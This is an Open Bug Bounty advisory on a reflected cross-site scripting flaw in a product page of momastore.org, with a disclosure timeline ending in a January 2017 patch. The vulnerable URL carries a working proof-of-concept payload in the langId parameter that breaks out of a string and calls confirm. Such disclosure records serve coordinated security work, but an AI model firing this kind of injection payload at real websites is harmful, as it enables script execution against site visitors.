momastore.org XSS vulnerability

2016-03-16T22:41:00
ID OBB:141837
Type openbugbounty
Reporter dim0k
Modified 2017-01-24T10:23:00

Description

Vulnerable URL:
https://www.momastore.org/museum/moma/ProductDisplay_Yoshimoto-Cube-No.-1_10451_10001_45657_-1_26715_26715_45658?momaProductId=45657&momaPartNumber;=67866-item&storeId;=10001&catalogId;=10451&langId;=-1x';%20confirm`XSSPOSED`//&returnURL;=ProductDisplay_Yoshimoto%20Cube%20No.%201_10451_10001_45657_-1_26715_26715&categoryId;=26715&productEmailURL;=MoMAProductCommonCntrCmd
Details:

Description| Value
---|---
Patched:| Yes, at 16.01.2017
Latest check for patch:| 16.01.2017 13:24 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 42054
Google Pagerank| 6
VIP website status:| Yes
Check momastore.org SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 16 March, 2016 22:41 GMT
Vulnerability existence verified and confirmed| 17 March, 2016 14:09 GMT
Generic security notifications sent to website owner| 17 March, 2016 14:09 GMT
Notification sent to subscribers (without technical details)| 17 March, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 9 June, 2016 14:11 GMT
Vulnerability patched by the website owner| 24 January, 2017 10:23 GMT